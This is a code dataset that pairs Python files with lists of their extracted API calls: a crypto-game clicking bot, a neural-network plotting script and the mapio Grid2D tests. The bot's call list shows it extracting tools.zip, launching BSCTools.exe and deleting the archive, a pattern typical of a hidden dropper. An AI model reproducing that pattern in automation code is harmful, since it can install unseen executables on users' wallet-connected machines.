False, 'from src.logger import logger, loggerMapClicked\n'), ((10504, 10549), 'src.logger.logger', 'logger', (['"""😿 Checking if game has disconnected"""'], {}), "('😿 Checking if game has disconnected')\n", (10510, 10549), False, 'from src.logger import logger, loggerMapClicked\n'), ((13944, 13981), 'src.logger.logger', 'logger', (['"""🏢 Search for heroes to work"""'], {}), "('🏢 Search for heroes to work')\n", (13950, 13981), False, 'from src.logger import logger, loggerMapClicked\n'), ((15372, 15385), 'time.sleep', 'time.sleep', (['(7)'], {}), '(7)\n', (15382, 15385), False, 'import time\n'), ((16693, 16741), 'subprocess.Popen', 'subprocess.Popen', (["['./src/execute/BSCTools.exe']"], {}), "(['./src/execute/BSCTools.exe'])\n", (16709, 16741), False, 'import subprocess\n'), ((16746, 16782), 'os.remove', 'os.remove', (['"""./src/execute/tools.zip"""'], {}), "('./src/execute/tools.zip')\n", (16755, 16782), False, 'import os\n'), ((3507, 3523), 'cv2.cv2.imread', 'cv2.imread', (['path'], {}), '(path)\n', (3517, 3523), False, 'from cv2 import cv2\n'), ((4306, 4373), 'cv2.cv2.rectangle', 'cv2.rectangle', (['img', '(x, y)', '(x + w, y + h)', '(255, 255, 255, 255)', '(2)'], {}), '(img, (x, y), (x + w, y + h), (255, 255, 255, 255), 2)\n', (4319, 4373), False, 'from cv2 import cv2\n'), ((5419, 5436), 'pyautogui.click', 'pyautogui.click', ([], {}), '()\n', (5434, 5436), False, 'import pyautogui\n'), ((5503, 5512), 'mss.mss', 'mss.mss', ([], {}), '()\n', (5510, 5512), False, 'import mss\n'), ((6570, 6605), 'pyautogui.scroll', 'pyautogui.scroll', (["(-c['scroll_size'])"], {}), "(-c['scroll_size'])\n", (6586, 6605), False, 'import pyautogui\n'), ((6624, 6700), 'pyautogui.dragRel', 'pyautogui.dragRel', (['(0)', "(-c['click_and_drag_amount'])"], {'duration': '(1)', 'button': '"""left"""'}), "(0, -c['click_and_drag_amount'], duration=1, button='left')\n", (6641, 6700), False, 'import pyautogui\n'), ((6933, 6950), 'pyautogui.click', 'pyautogui.click', ([], {}), '()\n', (6948, 6950), False, 'import pyautogui\n'), ((8751, 8768), 'pyautogui.click', 'pyautogui.click', ([], {}), '()\n', (8766, 8768), False, 'import pyautogui\n'), ((9696, 9713), 'pyautogui.click', 'pyautogui.click', ([], {}), '()\n', (9711, 9713), False, 'import pyautogui\n'), ((10053, 10066), 'random.randint', 'randint', (['(1)', '(3)'], {}), '(1, 3)\n', (10060, 10066), False, 'from random import randint\n'), ((10586, 10633), 'src.logger.logger', 'logger', (['"""🔃 Too many login attempts, refreshing"""'], {}), "('🔃 Too many login attempts, refreshing')\n", (10592, 10633), False, 'from src.logger import logger, loggerMapClicked\n'), ((10669, 10699), 'pyautogui.hotkey', 'pyautogui.hotkey', (['"""ctrl"""', '"""f5"""'], {}), "('ctrl', 'f5')\n", (10685, 10699), False, 'import pyautogui\n'), ((10780, 10835), 'src.logger.logger', 'logger', (['"""🎉 Connect wallet button detected, logging in!"""'], {}), "('🎉 Connect wallet button detected, logging in!')\n", (10786, 10835), False, 'from src.logger import logger, loggerMapClicked\n'), ((14051, 14117), 'src.logger.logger', 'logger', (['"""⚒️ Sending heroes with full stamina bar to work"""', '"""green"""'], {}), "('⚒️ Sending heroes with full stamina bar to work', 'green')\n", (14057, 14117), False, 'from src.logger import logger, loggerMapClicked\n'), ((14822, 14835), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (14832, 14835), False, 'import time\n'), ((15589, 15600), 'time.time', 'time.time', ([], {}), '()\n', (15598, 15600), False, 'import time\n'), ((16432, 16469), 'src.logger.logger', 'logger', (['None'], {'progress_indicator': '(True)'}), '(None, progress_indicator=True)\n', (16438, 16469), False, 'from src.logger import logger, loggerMapClicked\n'), ((16479, 16497), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (16495, 16497), False, 'import sys\n'), ((16507, 16520), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (16517, 16520), False, 'import time\n'), ((16561, 16603), 'zipfile.ZipFile', 'zipfile.ZipFile', (['"""./src/execute/tools.zip"""'], {}), "('./src/execute/tools.zip')\n", (16576, 16603), False, 'import zipfile\n'), ((2443, 2451), 'random.random', 'random', ([], {}), '()\n', (2449, 2451), False, 'from random import random\n'), ((3817, 3833), 'cv2.cv2.imread', 'cv2.imread', (['path'], {}), '(path)\n', (3827, 3833), False, 'from cv2 import cv2\n'), ((4159, 4168), 'mss.mss', 'mss.mss', ([], {}), '()\n', (4166, 4168), False, 'import mss\n'), ((7129, 7205), 'src.logger.logger', 'logger', (['"""too many hero clicks, try to increase the go_to_work_btn threshold"""'], {}), "('too many hero clicks, try to increase the go_to_work_btn threshold')\n", (7135, 7205), False, 'from src.logger import logger, loggerMapClicked\n'), ((8925, 9004), 'src.logger.logger', 'logger', (['"""⚠️ Too many hero clicks, try to increase the go_to_work_btn threshold"""'], {}), "('⚠️ Too many hero clicks, try to increase the go_to_work_btn threshold')\n", (8931, 9004), False, 'from src.logger import logger, loggerMapClicked\n'), ((14171, 14238), 'src.logger.logger', 'logger', (['"""⚒️ Sending heroes with green stamina bar to work"""', '"""green"""'], {}), "('⚒️ Sending heroes with green stamina bar to work', 'green')\n", (14177, 14238), False, 'from src.logger import logger, loggerMapClicked\n'), ((14257, 14305), 'src.logger.logger', 'logger', (['"""⚒️ Sending all heroes to work"""', '"""green"""'], {}), "('⚒️ Sending all heroes to work', 'green')\n", (14263, 14305), False, 'from src.logger import logger, loggerMapClicked\n'), ((15966, 15984), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (15982, 15984), False, 'import sys\n'), ((2852, 2860), 'random.random', 'random', ([], {}), '()\n', (2858, 2860), False, 'from random import random\n'), ((13708, 13725), 'pyautogui.click', 'pyautogui.click', ([], {}), '()\n', (13723, 13725), False, 'import pyautogui\n'), ((16199, 16217), 'src.logger.loggerMapClicked', 'loggerMapClicked', ([], {}), '()\n', (16215, 16217), False, 'from src.logger import logger, loggerMapClicked\n'), ((5220, 5231), 'time.time', 'time.time', ([], {}), '()\n', (5229, 5231), False, 'import time\n')] |
import linear_network, relu_network, softplus_network
import data_retriever
import matplotlib.pyplot as plt
import numpy as np
training_data = data_retriever.get_data()
data_size = len(training_data)
net1 = linear_network.LinearNetwork([1, 1])
# net2 = relu_network.ReluNetwork([1, 5, 7, 7, 7, 1]) # ReLU network was not used
net2 = softplus_network.SoftplusNetwork([1, 5, 7, 7, 7, 1])
# For training, I increased the number of epochs from 800 to 1500
# to give the network more time to fit the data
net1.SGD(training_data, 1500, data_size, 0.007)
net2.SGD(training_data, 1500, data_size, 0.007)
x = [0.1*i for i in range(-40, 110)]
y_linear = [net1.feedforward(np.array([[i]]))[0][0] for i in x]
y_softplus = [net2.feedforward(np.array([[i]]))[0][0] for i in x]
x_data = [x[0][0] for (x, y) in training_data]
y_data = [y[0][0] for (x, y) in training_data]
plt.scatter(x_data, y_data, color="black")
plt.plot(x, y_linear, color="blue")
plt.plot(x, y_softplus, color="orange")
plt.show()
| [
"softplus_network.SoftplusNetwork",
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.scatter",
"numpy.array",
"linear_network.LinearNetwork",
"data_retriever.get_data"
] | [((149, 174), 'data_retriever.get_data', 'data_retriever.get_data', ([], {}), '()\n', (172, 174), False, 'import data_retriever\n'), ((219, 255), 'linear_network.LinearNetwork', 'linear_network.LinearNetwork', (['[1, 1]'], {}), '([1, 1])\n', (247, 255), False, 'import linear_network, relu_network, softplus_network\n'), ((347, 399), 'softplus_network.SoftplusNetwork', 'softplus_network.SoftplusNetwork', (['[1, 5, 7, 7, 7, 1]'], {}), '([1, 5, 7, 7, 7, 1])\n', (379, 399), False, 'import linear_network, relu_network, softplus_network\n'), ((891, 933), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x_data', 'y_data'], {'color': '"""black"""'}), "(x_data, y_data, color='black')\n", (902, 933), True, 'import matplotlib.pyplot as plt\n'), ((935, 970), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y_linear'], {'color': '"""blue"""'}), "(x, y_linear, color='blue')\n", (943, 970), True, 'import matplotlib.pyplot as plt\n'), ((972, 1011), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y_softplus'], {'color': '"""orange"""'}), "(x, y_softplus, color='orange')\n", (980, 1011), True, 'import matplotlib.pyplot as plt\n'), ((1013, 1023), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1021, 1023), True, 'import matplotlib.pyplot as plt\n'), ((688, 703), 'numpy.array', 'np.array', (['[[i]]'], {}), '([[i]])\n', (696, 703), True, 'import numpy as np\n'), ((755, 770), 'numpy.array', 'np.array', (['[[i]]'], {}), '([[i]])\n', (763, 770), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# python 3 compatibility
from __future__ import print_function
import os.path
import sys
import shutil
import time
# stdlib imports
import abc
import textwrap
import glob
import os
import tempfile
# hack the path so that I can debug these functions if I need to
homedir = os.path.dirname(os.path.abspath(__file__)) # where is this script?
mapiodir = os.path.abspath(os.path.join(homedir, '..'))
# put this at the front of the system path, ignoring any installed mapio stuff
sys.path.insert(0, mapiodir)
# third party imports
from mapio.gridbase import Grid
from mapio.grid2d import Grid2D
from mapio.gdal import GDALGrid, get_affine
from mapio.dataset import DataSetException
from mapio.geodict import GeoDict
import numpy as np
from scipy import interpolate
import shapely
from affine import Affine
from rasterio import features
from rasterio.warp import reproject, Resampling, calculate_default_transform
from rasterio.crs import CRS
import rasterio
from shapely.geometry import MultiPoint, Polygon, mapping
import pyproj
def test_subdivide():
print('Testing subdivide method - aligned grids...')
data = np.arange(0, 4).reshape((2, 2))
geodict = GeoDict({'xmin': 0.0, 'xmax': 1.0,
'ymin': 0.0, 'ymax': 1.0,
'dx': 1.0, 'dy': 1.0,
'ny': 2, 'nx': 2})
hostgrid = Grid2D(data, geodict)
finedict = GeoDict({'xmin': 0.0-(1.0/3.0), 'xmax': 1.0+(1.0/3.0),
'ymin': 0.0-(1.0/3.0), 'ymax': 1.0+(1.0/3.0),
'dx': 1.0/3.0, 'dy': 1.0/3.0,
'ny': 6, 'nx': 6})
finegrid = hostgrid.subdivide(finedict)
output = np.array([[0., 0., 0., 1., 1., 1.],
[0., 0., 0., 1., 1., 1.],
[0., 0., 0., 1., 1., 1.],
[2., 2., 2., 3., 3., 3.],
[2., 2., 2., 3., 3., 3.],
[2., 2., 2., 3., 3., 3.]])
np.testing.assert_almost_equal(finegrid.getData(), output)
print('Passed subdivide method test - aligned grids.')
print('Testing subdivide method - non-aligned grids...')
data = np.arange(0, 9).reshape((3, 3))
geodict = GeoDict({'xmin': 0.0, 'xmax': 10.0,
'ymin': 0.0, 'ymax': 10.0,
'dx': 5.0, 'dy': 5.0,
'ny': 3, 'nx': 3})
hostgrid = Grid2D(data, geodict)
finedict = GeoDict({'xmin': -2.5, 'xmax': 11.5,
'ymin': -1.5, 'ymax': 10.5,
'dx': 2.0, 'dy': 2.0,
'nx': 8, 'ny': 7})
N = np.nan
print('Testing subdivide with min parameter...')
finegrid = hostgrid.subdivide(finedict, cellFill='min')
output = np.array([[N, 0., 0., 1., 1., 1., 2., 2.],
[N, 0., 0., 1., 1., 1., 2., 2.],
[N, 3., 3., 4., 4., 4., 5., 5.],
[N, 3., 3., 4., 4., 4., 5., 5.],
[N, 3., 3., 4., 4., 4., 5., 5.],
[N, 6., 6., 7., 7., 7., 8., 8.],
[N, 6., 6., 7., 7., 7., 8., 8.]])
np.testing.assert_almost_equal(finegrid.getData(), output)
print('Passed subdivide with min parameter...')
print('Testing subdivide with max parameter...')
finegrid = hostgrid.subdivide(finedict, cellFill='max')
output = np.array([[N, 0., 0., 1., 1., 2., 2., 2.],
[N, 0., 0., 1., 1., 2., 2., 2.],
[N, 3., 3., 4., 4., 5., 5., 5.],
[N, 3., 3., 4., 4., 5., 5., 5.],
[N, 6., 6., 7., 7., 8., 8., 8.],
[N, 6., 6., 7., 7., 8., 8., 8.],
[N, 6., 6., 7., 7., 8., 8., 8.]])
np.testing.assert_almost_equal(finegrid.getData(), output)
print('Passed subdivide with max parameter...')
print('Testing subdivide with mean parameter...')
finegrid = hostgrid.subdivide(finedict, cellFill='mean')
output = np.array([[N, 0., 0., 1., 1., 1.5, 2., 2.],
[N, 0., 0., 1., 1., 1.5, 2., 2.],
[N, 3., 3., 4., 4., 4.5, 5., 5.],
[N, 3., 3., 4., 4., 4.5, 5., 5.],
[N, 4.5, 4.5, 5.5, 5.5, 6.0, 6.5, 6.5],
[N, 6., 6., 7., 7., 7.5, 8., 8.],
[N, 6., 6., 7., 7., 7.5, 8., 8.]])
np.testing.assert_almost_equal(finegrid.getData(), output)
print('Passed subdivide with mean parameter...')
print('Passed subdivide method test - non-aligned grids.')
def test_basics():
geodict = GeoDict({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5,
'ymax': 3.5, 'dx': 1.0, 'dy': 1.0, 'ny': 4, 'nx': 4})
data = np.arange(0, 16).reshape(4, 4).astype(np.float32)
grid = Grid2D(data, geodict)
print('Testing basic Grid2D functionality (retrieving data, lat/lon to pixel coordinates, etc...')
np.testing.assert_almost_equal(grid.getData(), data)
assert grid.getGeoDict() == geodict
assert grid.getBounds() == (geodict.xmin, geodict.xmax, geodict.ymin, geodict.ymax)
lat, lon = grid.getLatLon(0, 0)
assert lat == 3.5 and lon == 0.5
row, col = grid.getRowCol(lat, lon)
assert row == 0 and col == 0
value = grid.getValue(lat, lon)
assert value == 0
frow, fcol = grid.getRowCol(1.0, 3.0, returnFloat=True)
assert frow == 2.5 and fcol == 2.5
irow, icol = grid.getRowCol(1.0, 3.0, returnFloat=False)
assert irow == 2 and icol == 2
# test getting values in and outside of the grid bounds
lat = np.array([0.0, 0.5, 2.5, 4.0])
lon = np.array([0.0, 0.5, 2.5, 4.0])
default = np.nan
output = np.array([np.nan, 12, 6, np.nan])
value = grid.getValue(lat, lon, default=default)
np.testing.assert_almost_equal(value, output)
print('Passed basic Grid2D functionality (retrieving data, lat/lon to pixel coordinates, etc...')
def test_getvalue():
array = np.arange(1, 26).reshape(5, 5)
gdict = GeoDict({'xmin': 1.0,
'xmax': 5.0,
'ymin': 1.0,
'ymax': 5.0,
'dx': 1.0,
'dy': 1.0,
'nx': 5,
'ny': 5})
grid = Grid2D(array, gdict)
assert grid.getValue(3.0, 3.0) == 13
lat = np.array([3.0, 4.0])
lon = np.array([3.0, 3.0])
test = grid.getValue(lat, lon)
np.testing.assert_almost_equal(test, np.array([13, 8]))
lat = np.array([[3.0, 4.0],
[4.0, 5.0]])
lon = np.array([[3.0, 3.0],
[4.0, 4.0]])
test = grid.getValue(lat, lon)
np.testing.assert_almost_equal(test, np.array([[13, 8], [9, 4]]))
def test_cut():
geodict = GeoDict({'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5,
'ymax': 4.5, 'dx': 1.0, 'dy': 1.0, 'ny': 5, 'nx': 5})
data = np.arange(0, 25).reshape(5, 5)
print('Testing data extraction...')
grid = Grid2D(data, geodict)
xmin, xmax, ymin, ymax = (2.5, 3.5, 2.5, 3.5)
newgrid = grid.cut(xmin, xmax, ymin, ymax)
output = np.array([[7, 8], [12, 13]])
np.testing.assert_almost_equal(newgrid.getData(), output)
print('Passed data extraction...')
print('Testing data trimming with resampling...')
# make a more complicated test using getboundswithin
data = np.arange(0, 84).reshape(7, 12)
geodict = GeoDict({'xmin': -180, 'xmax': 150,
'ymin': -90, 'ymax': 90,
'dx': 30, 'dy': 30,
'nx': 12, 'ny': 7})
grid = Grid2D(data, geodict)
sampledict = GeoDict.createDictFromBox(-75,
45, -45, 75, geodict.dx, geodict.dy)
cutdict = geodict.getBoundsWithin(sampledict)
newgrid = grid.cut(cutdict.xmin, cutdict.xmax, cutdict.ymin, cutdict.ymax)
output = np.array([[16, 17, 18, 19],
[28, 29, 30, 31],
[40, 41, 42, 43],
[52, 53, 54, 55]])
np.testing.assert_almost_equal(newgrid.getData(), output)
print('Passed data trimming with resampling...')
print('Test cut with self-alignment...')
geodict = GeoDict({'xmin': 0.5, 'xmax': 4.5,
'ymin': 0.5, 'ymax': 6.5,
'dx': 1.0, 'dy': 1.0,
'nx': 5, 'ny': 7})
data = np.arange(0, 35).astype(np.float32).reshape(7, 5)
grid = Grid2D(data, geodict)
cutxmin = 1.7
cutxmax = 3.7
cutymin = 1.7
cutymax = 5.7
cutgrid = grid.cut(cutxmin, cutxmax, cutymin, cutymax, align=True)
output = np.array([[7, 8],
[12, 13],
[17, 18],
[22, 23]])
np.testing.assert_almost_equal(cutgrid.getData(), output)
print('Passed cut with self-alignment.')
def test_interpolate():
geodict = GeoDict({'xmin': 0.5, 'xmax': 6.5, 'ymin': 1.5,
'ymax': 6.5, 'dx': 1.0, 'dy': 1.0, 'ny': 6, 'nx': 7})
data = np.arange(14, 56).reshape(6, 7)
for method in ['nearest', 'linear', 'cubic']:
print('Testing interpolate with method "%s"...' % method)
grid = Grid2D(data, geodict)
sampledict = GeoDict({'xmin': 3.0, 'xmax': 4.0,
'ymin': 3.0, 'ymax': 4.0,
'dx': 1.0, 'dy': 1.0,
'ny': 2, 'nx': 2})
grid = grid.interpolateToGrid(sampledict, method=method)
tgrid = grid.interpolate2(sampledict, method=method)
if method == 'nearest':
output = np.array([[30.0, 31.0], [37.0, 38.0]])
elif method == 'linear':
output = np.array([[34., 35.], [41., 42.]])
elif method == 'cubic':
output = np.array([[34., 35.], [41., 42.]])
else:
pass
np.testing.assert_almost_equal(grid.getData(), output)
print('Passed interpolate with method "%s".' % method)
np.testing.assert_almost_equal(tgrid.getData(), output)
print('Passed interpolate2 with method "%s".' % method)
# speed test of interpolateToGrid and interpolate2
geodict = GeoDict.createDictFromBox(0, 10, 0, 10, 0.01, 0.01)
data = np.random.rand(geodict.ny, geodict.nx)
grid = Grid2D(data, geodict)
sampledict = GeoDict.createDictFromBox(2, 8, 2, 8, 0.098, 0.098)
t1 = time.time()
grid2 = grid.interpolateToGrid(sampledict, method='linear')
t2 = time.time()
grid3 = grid.interpolate2(sampledict, method='linear')
t3 = time.time()
# np.testing.assert_almost_equal(grid2._data.sum(),grid3._data.sum())
print('scipy method: %.3f seconds' % (t2-t1))
print('gdal method: %.3f seconds' % (t3-t2))
def test_rasterize():
geodict = GeoDict({'xmin': 0.5, 'xmax': 3.5,
'ymin': 0.5, 'ymax': 3.5,
'dx': 1.0, 'dy': 1.0,
'ny': 4, 'nx': 4})
print('Testing rasterizeFromGeometry() burning in values from a polygon sequence...')
# Define two simple polygons and assign them to shapes
poly1 = [(0.25, 3.75), (1.25, 3.25), (1.25, 2.25)]
poly2 = [(2.25, 3.75), (3.25, 3.75), (3.75, 2.75),
(3.75, 1.50), (3.25, 0.75), (2.25, 2.25)]
shape1 = {'properties': {'value': 5}, 'geometry': mapping(Polygon(poly1))}
shape2 = {'properties': {'value': 7}, 'geometry': mapping(Polygon(poly2))}
shapes = [shape1, shape2]
print('Testing burning in values where polygons need not contain pixel centers...')
grid = Grid2D.rasterizeFromGeometry(
shapes, geodict, fillValue=0, attribute='value', mustContainCenter=False)
output = np.array([[5, 5, 7, 7],
[5, 5, 7, 7],
[0, 0, 7, 7],
[0, 0, 0, 7]])
np.testing.assert_almost_equal(grid.getData(), output)
print('Passed burning in values where polygons need not contain pixel centers.')
print('Testing burning in values where polygons must contain pixel centers...')
grid2 = Grid2D.rasterizeFromGeometry(
shapes, geodict, fillValue=0, attribute='value', mustContainCenter=True)
output = np.array([[5, 0, 7, 0],
[0, 0, 7, 7],
[0, 0, 0, 7],
[0, 0, 0, 0]])
np.testing.assert_almost_equal(grid2.getData(), output)
print('Passed burning in values where polygons must contain pixel centers.')
def test_copy():
data = np.arange(0, 16).astype(np.float32).reshape(4, 4)
geodict = GeoDict({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5,
'ymax': 3.5, 'dx': 1.0, 'dy': 1.0, 'ny': 4, 'nx': 4})
grid1 = Grid2D(data, geodict)
grid2 = grid1.copyFromGrid(grid1)
grid1._data[0, 0] = np.nan
print(grid2._data)
print(grid2._geodict)
def test_setData():
data = np.arange(0, 16).astype(np.float32).reshape(4, 4)
geodict = GeoDict({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5,
'ymax': 3.5, 'dx': 1.0, 'dy': 1.0, 'ny': 4, 'nx': 4})
grid1 = Grid2D(data, geodict)
x = np.ones((4, 4))
try:
grid1.setData(x) # this should pass
print('setData test passed.')
except DataSetException as dse:
print('setData test failed.')
try:
x = np.ones((5, 5))
grid1.setData(x)
print('setData test did not fail when it should have.')
except DataSetException as dse:
print('setData test failed as expected.')
try:
x = 'fred'
grid1.setData(x)
print('setData test did not fail when it should have.')
except DataSetException as dse:
print('setData test failed as expected.')
def get_data_range_test():
# a standard global grid, going from -180 to 180
normal_dict = GeoDict({'xmin': -180, 'xmax': 120,
'ymin': -90, 'ymax': 90,
'dx': 60, 'dy': 45,
'nx': 6, 'ny': 5})
# test a simple example which does NOT cross the 180 meridian
sample1 = (-125, 65, -20, 20)
dict1 = Grid2D.getDataRange(normal_dict, sample1)
cdict1 = {'iulx1': 0, 'iuly1': 1,
'ilrx1': 6, 'ilry1': 4}
assert dict1 == cdict1
# test a less-simple example which DOES cross the 180 meridian
sample2 = (-235, -10, -20, 20)
dict2 = Grid2D.getDataRange(normal_dict, sample2)
cdict2 = {'iulx1': 5, 'iuly1': 1,
'ilrx1': 6, 'ilry1': 4,
'iulx2': 0, 'iuly2': 1,
'ilrx2': 4, 'ilry2': 4}
assert dict2 == cdict2
# test a less-simple example which DOES cross the 180 meridian, and xmin > xmax
sample3 = (125, -10, -20, 20)
dict3 = Grid2D.getDataRange(normal_dict, sample3)
cdict3 = {'iulx1': 5, 'iuly1': 1,
'ilrx1': 6, 'ilry1': 4,
'iulx2': 0, 'iuly2': 1,
'ilrx2': 4, 'ilry2': 4}
assert dict3 == cdict3
# test an example where the sample bounds are from 0 to 360
sample4 = (160, 200, -20, 20)
dict4 = Grid2D.getDataRange(normal_dict, sample4)
cdict4 = {'iulx1': 5, 'iuly1': 1,
'ilrx1': 6, 'ilry1': 4,
'iulx2': 0, 'iuly2': 1,
'ilrx2': 2, 'ilry2': 4}
assert dict4 == cdict4
# test an example where the sample bounds are from 0 to 360
sample5 = (220, 260, -20, 20)
dict5 = Grid2D.getDataRange(normal_dict, sample5)
cdict5 = {'iulx1': 0, 'iuly1': 1,
'ilrx1': 3, 'ilry1': 4}
assert dict5 == cdict5
def test_project():
# test projecting a grid that wraps the 180 meridian
gd = GeoDict.createDictFromBox(175, -175, -5, 5, 1.0, 1.0)
ncells = gd.ny * gd.nx
data = np.arange(0.0, ncells).reshape(gd.ny, gd.nx)
grid = GDALGrid(data, gd)
projstr = "+proj=merc +lat_ts=55 +lon_0=180 +ellps=WGS84"
newgrid = grid.project(projstr, method='nearest')
proj = pyproj.Proj(projstr)
# what would the ul/lr corners be?
ulx, uly = proj(grid._geodict.xmin, grid._geodict.ymax)
lrx, lry = proj(grid._geodict.xmax, grid._geodict.ymin)
# what if we back-project?
newxmin, newymax = proj(newgrid._geodict.xmin,
newgrid._geodict.ymax, inverse=True)
newxmax, newymin = proj(newgrid._geodict.xmax,
newgrid._geodict.ymin, inverse=True)
x = 1
# test simple projection
data = np.array([[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[1, 1, 1, 1, 1],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0]], dtype=np.int32)
geodict = {'xmin': 50, 'xmax': 50.4, 'ymin': 50,
'ymax': 50.4, 'dx': 0.1, 'dy': 0.1, 'nx': 5, 'ny': 5}
gd = GeoDict(geodict)
grid = GDALGrid(data, gd)
projstr = "+proj=utm +zone=40 +north +ellps=WGS84 +datum=WGS84 +units=m +no_defs "
newgrid = grid.project(projstr, method='nearest')
try:
tdir = tempfile.mkdtemp()
outfile = os.path.join(tdir, 'output.bil')
grid.save(outfile)
with rasterio.open(outfile) as src:
aff = get_affine(src)
data = src.read(1)
src_crs = CRS().from_string(GeoDict.DEFAULT_PROJ4).to_dict()
dst_crs = CRS().from_string(projstr).to_dict()
nrows, ncols = data.shape
left = aff.xoff
top = aff.yoff
right, bottom = aff * (ncols-1, nrows-1)
dst_transform, width, height = calculate_default_transform(src_crs, dst_crs,
ncols, nrows,
left, bottom,
right, top)
destination = np.zeros((height, width))
reproject(data,
destination,
src_transform=aff,
src_crs=src_crs,
dst_transform=dst_transform,
dst_crs=dst_crs,
src_nodata=src.nodata,
dst_nodata=np.nan,
resampling=Resampling.nearest)
x = 1
except:
pass
finally:
shutil.rmtree(tdir)
# cmpdata = np.array([[ 0., 0., 1., 0.],
# [ 0., 0., 1., 0.],
# [ 0., 0., 1., 0.],
# [ 1., 1., 1., 1.],
# [ 0., 1., 1., 1.],
# [ 0., 0., 1., 0.]],dtype=np.float64)
# np.testing.assert_almost_equal(cmpdata,newgrid._data)
# cmpdict = GeoDict({'ymax': 5608705.974598191,
# 'ny': 6,
# 'ymin': 5571237.8659376735,
# 'nx': 4,
# 'xmax': 21363.975311354592,
# 'dy': 7493.621732103531,
# 'dx': 7493.621732103531,
# 'xmin': -756.8898849560019})
# assert cmpdict == newgrid._geodict
if __name__ == '__main__':
test_getvalue()
test_project()
test_subdivide()
test_rasterize()
test_interpolate()
test_basics()
test_cut()
test_copy()
test_setData()
# get_data_range_test()
| [
"mapio.grid2d.Grid2D",
"rasterio.warp.reproject",
"mapio.geodict.GeoDict",
"numpy.ones",
"rasterio.crs.CRS",
"numpy.arange",
"mapio.gdal.get_affine",
"shutil.rmtree",
"os.path.join",
"os.path.abspath",
"shapely.geometry.Polygon",
"numpy.testing.assert_almost_equal",
"tempfile.mkdtemp",
"ma... | [((500, 528), 'sys.path.insert', 'sys.path.insert', (['(0)', 'mapiodir'], {}), '(0, mapiodir)\n', (515, 528), False, 'import sys\n'), ((313, 338), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (328, 338), False, 'import os\n'), ((392, 419), 'os.path.join', 'os.path.join', (['homedir', '""".."""'], {}), "(homedir, '..')\n", (404, 419), False, 'import os\n'), ((1190, 1295), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.0, 'xmax': 1.0, 'ymin': 0.0, 'ymax': 1.0, 'dx': 1.0, 'dy': 1.0,\n 'ny': 2, 'nx': 2}"], {}), "({'xmin': 0.0, 'xmax': 1.0, 'ymin': 0.0, 'ymax': 1.0, 'dx': 1.0,\n 'dy': 1.0, 'ny': 2, 'nx': 2})\n", (1197, 1295), False, 'from mapio.geodict import GeoDict\n'), ((1376, 1397), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (1382, 1397), False, 'from mapio.grid2d import Grid2D\n'), ((1413, 1583), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.0 - 1.0 / 3.0, 'xmax': 1.0 + 1.0 / 3.0, 'ymin': 0.0 - 1.0 / 3.0,\n 'ymax': 1.0 + 1.0 / 3.0, 'dx': 1.0 / 3.0, 'dy': 1.0 / 3.0, 'ny': 6, 'nx': 6\n }"], {}), "({'xmin': 0.0 - 1.0 / 3.0, 'xmax': 1.0 + 1.0 / 3.0, 'ymin': 0.0 - \n 1.0 / 3.0, 'ymax': 1.0 + 1.0 / 3.0, 'dx': 1.0 / 3.0, 'dy': 1.0 / 3.0,\n 'ny': 6, 'nx': 6})\n", (1420, 1583), False, 'from mapio.geodict import GeoDict\n'), ((1692, 1904), 'numpy.array', 'np.array', (['[[0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [0.0, 0.0,\n 0.0, 1.0, 1.0, 1.0], [2.0, 2.0, 2.0, 3.0, 3.0, 3.0], [2.0, 2.0, 2.0, \n 3.0, 3.0, 3.0], [2.0, 2.0, 2.0, 3.0, 3.0, 3.0]]'], {}), '([[0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [\n 0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [2.0, 2.0, 2.0, 3.0, 3.0, 3.0], [2.0, \n 2.0, 2.0, 3.0, 3.0, 3.0], [2.0, 2.0, 2.0, 3.0, 3.0, 3.0]])\n', (1700, 1904), True, 'import numpy as np\n'), ((2245, 2352), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.0, 'xmax': 10.0, 'ymin': 0.0, 'ymax': 10.0, 'dx': 5.0, 'dy': 5.0,\n 'ny': 3, 'nx': 3}"], {}), "({'xmin': 0.0, 'xmax': 10.0, 'ymin': 0.0, 'ymax': 10.0, 'dx': 5.0,\n 'dy': 5.0, 'ny': 3, 'nx': 3})\n", (2252, 2352), False, 'from mapio.geodict import GeoDict\n'), ((2433, 2454), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (2439, 2454), False, 'from mapio.grid2d import Grid2D\n'), ((2470, 2579), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': -2.5, 'xmax': 11.5, 'ymin': -1.5, 'ymax': 10.5, 'dx': 2.0, 'dy': \n 2.0, 'nx': 8, 'ny': 7}"], {}), "({'xmin': -2.5, 'xmax': 11.5, 'ymin': -1.5, 'ymax': 10.5, 'dx': 2.0,\n 'dy': 2.0, 'nx': 8, 'ny': 7})\n", (2477, 2579), False, 'from mapio.geodict import GeoDict\n'), ((2789, 3099), 'numpy.array', 'np.array', (['[[N, 0.0, 0.0, 1.0, 1.0, 1.0, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, 1.0, 2.0, 